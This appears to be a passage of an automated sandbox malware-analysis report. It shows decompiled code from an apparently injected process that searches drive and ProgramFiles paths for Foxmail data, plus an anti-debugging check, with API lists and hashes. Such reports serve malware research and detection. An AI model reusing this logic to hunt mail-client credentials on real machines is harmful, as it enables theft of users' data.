                                                                                                                                                                                                                                                                  				char _v1104;
                                                                                                                                                                                                                                                                  				short _v1106;
                                                                                                                                                                                                                                                                  				short _v1108;
                                                                                                                                                                                                                                                                  				char _v1624;
                                                                                                                                                                                                                                                                  				short _v1626;
                                                                                                                                                                                                                                                                  				short _v1628;
                                                                                                                                                                                                                                                                  				char _v2144;
                                                                                                                                                                                                                                                                  				short _v2146;
                                                                                                                                                                                                                                                                  				short _v2148;
                                                                                                                                                                                                                                                                  				char _v2664;
                                                                                                                                                                                                                                                                  				short _v2666;
                                                                                                                                                                                                                                                                  				short _v2668;
                                                                                                                                                                                                                                                                  				char _v3184;
                                                                                                                                                                                                                                                                  				short _v3186;
                                                                                                                                                                                                                                                                  				char _v3188;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				short _t73;
                                                                                                                                                                                                                                                                  				short _t76;
                                                                                                                                                                                                                                                                  				short _t79;
                                                                                                                                                                                                                                                                  				short _t82;
                                                                                                                                                                                                                                                                  				short _t85;
                                                                                                                                                                                                                                                                  				short _t90;
                                                                                                                                                                                                                                                                  				short _t91;
                                                                                                                                                                                                                                                                  				short _t92;
                                                                                                                                                                                                                                                                  				short _t93;
                                                                                                                                                                                                                                                                  				short _t94;
                                                                                                                                                                                                                                                                  				short _t95;
                                                                                                                                                                                                                                                                  				short _t96;
                                                                                                                                                                                                                                                                  				short _t97;
                                                                                                                                                                                                                                                                  				short _t98;
                                                                                                                                                                                                                                                                  				short _t99;
                                                                                                                                                                                                                                                                  				short _t100;
                                                                                                                                                                                                                                                                  				short _t101;
                                                                                                                                                                                                                                                                  				void* _t144;
                                                                                                                                                                                                                                                                  				short _t146;
                                                                                                                                                                                                                                                                  				signed int _t147;
                                                                                                                                                                                                                                                                  				short _t176;
                                                                                                                                                                                                                                                                  				void* _t179;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t73 = 0x43;
                                                                                                                                                                                                                                                                  				_t176 = 0x3a;
                                                                                                                                                                                                                                                                  				_v3188 = _t73;
                                                                                                                                                                                                                                                                  				_v3186 = _t176;
                                                                                                                                                                                                                                                                  				_t144 = __ecx;
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v3184, 0, 0x204);
                                                                                                                                                                                                                                                                  				_t76 = 0x44;
                                                                                                                                                                                                                                                                  				_v1108 = _t76;
                                                                                                                                                                                                                                                                  				_v1106 = _t176;
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v1104, 0, 0x204);
                                                                                                                                                                                                                                                                  				_t79 = 0x45;
                                                                                                                                                                                                                                                                  				_v1628 = _t79;
                                                                                                                                                                                                                                                                  				_v1626 = _t176;
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v1624, 0, 0x204);
                                                                                                                                                                                                                                                                  				_t82 = 0x46;
                                                                                                                                                                                                                                                                  				_v2148 = _t82;
                                                                                                                                                                                                                                                                  				_v2146 = _t176;
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v2144, 0, 0x204);
                                                                                                                                                                                                                                                                  				_t85 = 0x47;
                                                                                                                                                                                                                                                                  				_v2668 = _t85;
                                                                                                                                                                                                                                                                  				_v2666 = _t176;
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v2664, 0, 0x204);
                                                                                                                                                                                                                                                                  				E10002C40(_t176,  &_v588, 0, 0x208);
                                                                                                                                                                                                                                                                  				_t90 = 0x5c;
                                                                                                                                                                                                                                                                  				_v68 = _t90;
                                                                                                                                                                                                                                                                  				_t91 = 0x50;
                                                                                                                                                                                                                                                                  				_t146 = 0x72;
                                                                                                                                                                                                                                                                  				_v66 = _t91;
                                                                                                                                                                                                                                                                  				_t92 = 0x6f;
                                                                                                                                                                                                                                                                  				_v62 = _t92;
                                                                                                                                                                                                                                                                  				_t93 = 0x67;
                                                                                                                                                                                                                                                                  				_v60 = _t93;
                                                                                                                                                                                                                                                                  				_t94 = 0x61;
                                                                                                                                                                                                                                                                  				_v56 = _t94;
                                                                                                                                                                                                                                                                  				_t95 = 0x6d;
                                                                                                                                                                                                                                                                  				_v64 = _t146;
                                                                                                                                                                                                                                                                  				_v58 = _t146;
                                                                                                                                                                                                                                                                  				_v54 = _t95;
                                                                                                                                                                                                                                                                  				_t96 = 0x20;
                                                                                                                                                                                                                                                                  				_v52 = _t96;
                                                                                                                                                                                                                                                                  				_t97 = 0x46;
                                                                                                                                                                                                                                                                  				_v50 = _t97;
                                                                                                                                                                                                                                                                  				_t98 = 0x69;
                                                                                                                                                                                                                                                                  				_v48 = _t98;
                                                                                                                                                                                                                                                                  				_t99 = 0x6c;
                                                                                                                                                                                                                                                                  				_v46 = _t99;
                                                                                                                                                                                                                                                                  				_t100 = 0x65;
                                                                                                                                                                                                                                                                  				_v44 = _t100;
                                                                                                                                                                                                                                                                  				_t101 = 0x73;
                                                                                                                                                                                                                                                                  				_v42 = _t101;
                                                                                                                                                                                                                                                                  				_t147 = 9;
                                                                                                                                                                                                                                                                  				memset( &_v40, 0, _t147 << 2);
                                                                                                                                                                                                                                                                  				GetEnvironmentVariableW("ProgramFiles",  &_v588, 0x104);
                                                                                                                                                                                                                                                                  				_t179 = 2;
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v3188, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v1108, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v1628, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v2148, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v2668, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				E100010F1(_t144,  &_v588, "Foxmail", 0, _t179); // executed
                                                                                                                                                                                                                                                                  				if( *((short*)(_t184 + lstrlenW( &_v588) * 2 - 0x24a)) == 0x29) {
                                                                                                                                                                                                                                                                  					 *((short*)(_t184 + lstrlenW( &_v588) * 2 - 0x254)) = 0;
                                                                                                                                                                                                                                                                  					E100010F1(_t144,  &_v588, "Foxmail", 0, 2); // executed
                                                                                                                                                                                                                                                                  					lstrcatW( &(( &_v1108)[lstrlenW( &_v1108)]),  &_v68);
                                                                                                                                                                                                                                                                  					E100010F1(_t144,  &_v1108, "Foxmail", 0, 2); // executed
                                                                                                                                                                                                                                                                  					lstrcatW( &(( &_v1628)[lstrlenW( &_v1628)]),  &_v68);
                                                                                                                                                                                                                                                                  					E100010F1(_t144,  &_v1628, "Foxmail", 0, 2); // executed
                                                                                                                                                                                                                                                                  					lstrcatW( &(( &_v2148)[lstrlenW( &_v2148)]),  &_v68);
                                                                                                                                                                                                                                                                  					E100010F1(_t144,  &_v2148, "Foxmail", 0, 2); // executed
                                                                                                                                                                                                                                                                  					lstrcatW( &(( &_v2668)[lstrlenW( &_v2668)]),  &_v68);
                                                                                                                                                                                                                                                                  					E100010F1(_t144,  &_v2668, "Foxmail", 0, 2); // executed
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 0;
                                                                                                                                                                                                                                                                  			}


























































                                                                                                                                                                                                                                                                  0x100012fc
                                                                                                                                                                                                                                                                  0x100012ff
                                                                                                                                                                                                                                                                  0x10001305
                                                                                                                                                                                                                                                                  0x10001313
                                                                                                                                                                                                                                                                  0x1000131d
                                                                                                                                                                                                                                                                  0x1000131f
                                                                                                                                                                                                                                                                  0x10001326
                                                                                                                                                                                                                                                                  0x10001328
                                                                                                                                                                                                                                                                  0x10001338
                                                                                                                                                                                                                                                                  0x1000133f
                                                                                                                                                                                                                                                                  0x10001346
                                                                                                                                                                                                                                                                  0x10001348
                                                                                                                                                                                                                                                                  0x10001358
                                                                                                                                                                                                                                                                  0x1000135f
                                                                                                                                                                                                                                                                  0x10001366
                                                                                                                                                                                                                                                                  0x10001368
                                                                                                                                                                                                                                                                  0x10001378
                                                                                                                                                                                                                                                                  0x1000137f
                                                                                                                                                                                                                                                                  0x10001386
                                                                                                                                                                                                                                                                  0x10001388
                                                                                                                                                                                                                                                                  0x10001397
                                                                                                                                                                                                                                                                  0x100013a0
                                                                                                                                                                                                                                                                  0x100013b2
                                                                                                                                                                                                                                                                  0x100013bc
                                                                                                                                                                                                                                                                  0x100013bf
                                                                                                                                                                                                                                                                  0x100013c3
                                                                                                                                                                                                                                                                  0x100013c6
                                                                                                                                                                                                                                                                  0x100013c9
                                                                                                                                                                                                                                                                  0x100013cd
                                                                                                                                                                                                                                                                  0x100013d0
                                                                                                                                                                                                                                                                  0x100013d4
                                                                                                                                                                                                                                                                  0x100013d7
                                                                                                                                                                                                                                                                  0x100013db
                                                                                                                                                                                                                                                                  0x100013de
                                                                                                                                                                                                                                                                  0x100013e2
                                                                                                                                                                                                                                                                  0x100013e3
                                                                                                                                                                                                                                                                  0x100013e7
                                                                                                                                                                                                                                                                  0x100013eb
                                                                                                                                                                                                                                                                  0x100013f1
                                                                                                                                                                                                                                                                  0x100013f4
                                                                                                                                                                                                                                                                  0x100013fb
                                                                                                                                                                                                                                                                  0x100013fe
                                                                                                                                                                                                                                                                  0x10001402
                                                                                                                                                                                                                                                                  0x10001405
                                                                                                                                                                                                                                                                  0x10001409
                                                                                                                                                                                                                                                                  0x1000140c
                                                                                                                                                                                                                                                                  0x10001410
                                                                                                                                                                                                                                                                  0x10001413
                                                                                                                                                                                                                                                                  0x10001417
                                                                                                                                                                                                                                                                  0x1000141a
                                                                                                                                                                                                                                                                  0x10001420
                                                                                                                                                                                                                                                                  0x10001421
                                                                                                                                                                                                                                                                  0x10001434
                                                                                                                                                                                                                                                                  0x1000143c
                                                                                                                                                                                                                                                                  0x1000144c
                                                                                                                                                                                                                                                                  0x10001460
                                                                                                                                                                                                                                                                  0x10001474
                                                                                                                                                                                                                                                                  0x10001488
                                                                                                                                                                                                                                                                  0x1000149c
                                                                                                                                                                                                                                                                  0x100014b0
                                                                                                                                                                                                                                                                  0x100014d0
                                                                                                                                                                                                                                                                  0x100014ed
                                                                                                                                                                                                                                                                  0x100014fc
                                                                                                                                                                                                                                                                  0x10001521
                                                                                                                                                                                                                                                                  0x10001534
                                                                                                                                                                                                                                                                  0x10001553
                                                                                                                                                                                                                                                                  0x10001566
                                                                                                                                                                                                                                                                  0x10001585
                                                                                                                                                                                                                                                                  0x10001598
                                                                                                                                                                                                                                                                  0x100015b7
                                                                                                                                                                                                                                                                  0x100015ca
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100015d4
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                                                  • Opcode ID: 36096606946c69add60669d01d7e5e302dd749f5cacab8148f4cda979b8670bb
                                                                                                                                                                                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36096606946c69add60669d01d7e5e302dd749f5cacab8148f4cda979b8670bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                                                                                                  			E100060E2(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				char _v0;
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v524;
                                                                                                                                                                                                                                                                  				intOrPtr _v528;
                                                                                                                                                                                                                                                                  				void* _v532;
                                                                                                                                                                                                                                                                  				intOrPtr _v536;
                                                                                                                                                                                                                                                                  				char _v540;
                                                                                                                                                                                                                                                                  				intOrPtr _v544;
                                                                                                                                                                                                                                                                  				intOrPtr _v548;
                                                                                                                                                                                                                                                                  				intOrPtr _v552;
                                                                                                                                                                                                                                                                  				intOrPtr _v556;
                                                                                                                                                                                                                                                                  				intOrPtr _v560;
                                                                                                                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                                                                                                                  				intOrPtr _v568;
                                                                                                                                                                                                                                                                  				intOrPtr _v572;
                                                                                                                                                                                                                                                                  				intOrPtr _v576;
                                                                                                                                                                                                                                                                  				intOrPtr _v580;
                                                                                                                                                                                                                                                                  				intOrPtr _v584;
                                                                                                                                                                                                                                                                  				char _v724;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				intOrPtr _v800;
                                                                                                                                                                                                                                                                  				char _v804;
                                                                                                                                                                                                                                                                  				struct _EXCEPTION_POINTERS _v812;
                                                                                                                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                                                                                                                  				char* _t47;
                                                                                                                                                                                                                                                                  				char* _t49;
                                                                                                                                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                                                                                                                                  				int _t68;
                                                                                                                                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t69 = __esi;
                                                                                                                                                                                                                                                                  				_t67 = __edi;
                                                                                                                                                                                                                                                                  				_t66 = __edx;
                                                                                                                                                                                                                                                                  				_t61 = __ebx;
                                                                                                                                                                                                                                                                  				_t40 =  *0x10013014; // 0xf4aa7632
                                                                                                                                                                                                                                                                  				_t41 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                  				_v8 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                  				if(_a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_push(_a4);
                                                                                                                                                                                                                                                                  					E10002753(_t41);
                                                                                                                                                                                                                                                                  					_pop(_t62);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E10002C40(_t67,  &_v804, 0, 0x50);
                                                                                                                                                                                                                                                                  				E10002C40(_t67,  &_v724, 0, 0x2cc);
                                                                                                                                                                                                                                                                  				_v812.ExceptionRecord =  &_v804;
                                                                                                                                                                                                                                                                  				_t47 =  &_v724;
                                                                                                                                                                                                                                                                  				_v812.ContextRecord = _t47;
                                                                                                                                                                                                                                                                  				_v548 = _t47;
                                                                                                                                                                                                                                                                  				_v552 = _t62;
                                                                                                                                                                                                                                                                  				_v556 = _t66;
                                                                                                                                                                                                                                                                  				_v560 = _t61;
                                                                                                                                                                                                                                                                  				_v564 = _t69;
                                                                                                                                                                                                                                                                  				_v568 = _t67;
                                                                                                                                                                                                                                                                  				_v524 = ss;
                                                                                                                                                                                                                                                                  				_v536 = cs;
                                                                                                                                                                                                                                                                  				_v572 = ds;
                                                                                                                                                                                                                                                                  				_v576 = es;
                                                                                                                                                                                                                                                                  				_v580 = fs;
                                                                                                                                                                                                                                                                  				_v584 = gs;
                                                                                                                                                                                                                                                                  				asm("pushfd");
                                                                                                                                                                                                                                                                  				_pop( *_t22);
                                                                                                                                                                                                                                                                  				_v540 = _v0;
                                                                                                                                                                                                                                                                  				_t49 =  &_v0;
                                                                                                                                                                                                                                                                  				_v528 = _t49;
                                                                                                                                                                                                                                                                  				_v724 = 0x10001;
                                                                                                                                                                                                                                                                  				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                                                                                                                                                                                                  				_v804 = _a8;
                                                                                                                                                                                                                                                                  				_v800 = _a12;
                                                                                                                                                                                                                                                                  				_v792 = _v0;
                                                                                                                                                                                                                                                                  				_t68 = IsDebuggerPresent();
                                                                                                                                                                                                                                                                  				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                                  				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_push(_a4);
                                                                                                                                                                                                                                                                  					E10002753(_t57);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return E10002ADA(_v8 ^ _t70);
                                                                                                                                                                                                                                                                  			}




































                                                                                                                                                                                                                                                                  0x100060e2
                                                                                                                                                                                                                                                                  0x100060e2
                                                                                                                                                                                                                                                                  0x100060e2
                                                                                                                                                                                                                                                                  0x100060e2
                                                                                                                                                                                                                                                                  0x100060ed
                                                                                                                                                                                                                                                                  0x100060f2
                                                                                                                                                                                                                                                                  0x100060f4
                                                                                                                                                                                                                                                                  0x100060fc
                                                                                                                                                                                                                                                                  0x100060fe
                                                                                                                                                                                                                                                                  0x10006101
                                                                                                                                                                                                                                                                  0x10006106
                                                                                                                                                                                                                                                                  0x10006106
                                                                                                                                                                                                                                                                  0x10006112
                                                                                                                                                                                                                                                                  0x10006125
                                                                                                                                                                                                                                                                  0x10006133
                                                                                                                                                                                                                                                                  0x10006139
                                                                                                                                                                                                                                                                  0x1000613f
                                                                                                                                                                                                                                                                  0x10006145
                                                                                                                                                                                                                                                                  0x1000614b
                                                                                                                                                                                                                                                                  0x10006151
                                                                                                                                                                                                                                                                  0x10006157
                                                                                                                                                                                                                                                                  0x1000615d
                                                                                                                                                                                                                                                                  0x10006163
                                                                                                                                                                                                                                                                  0x10006169
                                                                                                                                                                                                                                                                  0x10006170
                                                                                                                                                                                                                                                                  0x10006177
                                                                                                                                                                                                                                                                  0x1000617e
                                                                                                                                                                                                                                                                  0x10006185
                                                                                                                                                                                                                                                                  0x1000618c
                                                                                                                                                                                                                                                                  0x10006193
                                                                                                                                                                                                                                                                  0x10006194
                                                                                                                                                                                                                                                                  0x1000619d
                                                                                                                                                                                                                                                                  0x100061a3
                                                                                                                                                                                                                                                                  0x100061a6
                                                                                                                                                                                                                                                                  0x100061ac
                                                                                                                                                                                                                                                                  0x100061b9
                                                                                                                                                                                                                                                                  0x100061c2
                                                                                                                                                                                                                                                                  0x100061cb
                                                                                                                                                                                                                                                                  0x100061d4
                                                                                                                                                                                                                                                                  0x100061e2
                                                                                                                                                                                                                                                                  0x100061e4
                                                                                                                                                                                                                                                                  0x100061f9
                                                                                                                                                                                                                                                                  0x10006205
                                                                                                                                                                                                                                                                  0x10006208
                                                                                                                                                                                                                                                                  0x1000620d
                                                                                                                                                                                                                                                                  0x1000621c

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: 821e7c4140ef768d0b6613ac502d2fa2fb370fc89d2bf4104d63d322b2a87aa3
                                                                                                                                                                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 821e7c4140ef768d0b6613ac502d2fa2fb370fc89d2bf4104d63d322b2a87aa3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E10004AB4(int _a4) {
                                                                                                                                                                                                                                                                  				void* _t14;
                                                                                                                                                                                                                                                                  				void* _t16;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(E10006025(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                  					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E10004B39(_t14, _t16, _a4);
                                                                                                                                                                                                                                                                  				ExitProcess(_a4);
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x10004ac0
                                                                                                                                                                                                                                                                  0x10004adc
                                                                                                                                                                                                                                                                  0x10004adc
                                                                                                                                                                                                                                                                  0x10004ae5
                                                                                                                                                                                                                                                                  0x10004aee

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?), ref: 10004AD5
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?), ref: 10004ADC
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                                                                                                                  			E10006580(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				intOrPtr* _v32;
                                                                                                                                                                                                                                                                  				CHAR* _v36;
                                                                                                                                                                                                                                                                  				signed int _v48;
                                                                                                                                                                                                                                                                  				char _v286;
                                                                                                                                                                                                                                                                  				signed int _v287;
                                                                                                                                                                                                                                                                  				char _v288;
                                                                                                                                                                                                                                                                  				void _v332;
                                                                                                                                                                                                                                                                  				intOrPtr* _v336;
                                                                                                                                                                                                                                                                  				signed int _v340;
                                                                                                                                                                                                                                                                  				signed int _v344;
                                                                                                                                                                                                                                                                  				intOrPtr _v372;
                                                                                                                                                                                                                                                                  				signed int _t35;
                                                                                                                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                                                                                                                  				signed int _t43;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				signed char _t47;
                                                                                                                                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                                                                                                                                  				union _FINDEX_INFO_LEVELS _t57;
                                                                                                                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                                                                                                                  				signed int _t65;
                                                                                                                                                                                                                                                                  				void* _t72;
                                                                                                                                                                                                                                                                  				void* _t74;
                                                                                                                                                                                                                                                                  				signed int _t75;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				CHAR* _t79;
                                                                                                                                                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                                                                                                                                                  				intOrPtr _t85;
                                                                                                                                                                                                                                                                  				void* _t87;
                                                                                                                                                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                                                                                                                                                  				signed int _t92;
                                                                                                                                                                                                                                                                  				signed int _t96;
                                                                                                                                                                                                                                                                  				void* _t101;
                                                                                                                                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                                                                                                                                  				signed int _t105;
                                                                                                                                                                                                                                                                  				union _FINDEX_INFO_LEVELS _t106;
                                                                                                                                                                                                                                                                  				void* _t111;
